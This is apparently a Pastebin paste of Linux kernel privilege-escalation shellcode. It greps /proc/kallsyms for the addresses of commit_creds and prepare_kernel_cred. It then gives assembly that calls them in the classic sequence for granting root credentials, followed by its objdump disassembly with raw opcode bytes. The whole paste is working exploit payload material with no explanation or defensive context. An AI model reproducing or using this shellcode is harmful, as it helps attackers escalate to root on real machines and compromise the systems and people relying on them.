Advertisement
Guest User

Untitled

a guest
Jun 26th, 2019
85
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.50 KB | None | 0 0
  1. #grep commit_creds /proc/kallsyms
  2. c907eea0 T commit_creds
  3.  
  4. #grep prepare_kernel_cred /proc/kallsyms
  5. c907f1d0 T prepare_kernel_cred
  6.  
  7. main:
  8. xor eax,eax
  9. call 0xc907f1d0
  10. call 0xc907eea0
  11. ret
  12.  
  13. shellcode: file format elf32-i386
  14.  
  15. Disassembly of section .text:
  16.  
  17. 08048060 <main>: 8048060: 31 c0 xor %eax,%eax
  18.  
  19. 8048062: e8 69 71 03 c1 call c907f1d0 <_end+0xc1036160>
  20.  
  21. 8048067: e8 34 6e 03 c1 call c907eea0 <_end+0xc1035e30>
  22.  
  23. 804806c: c3
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement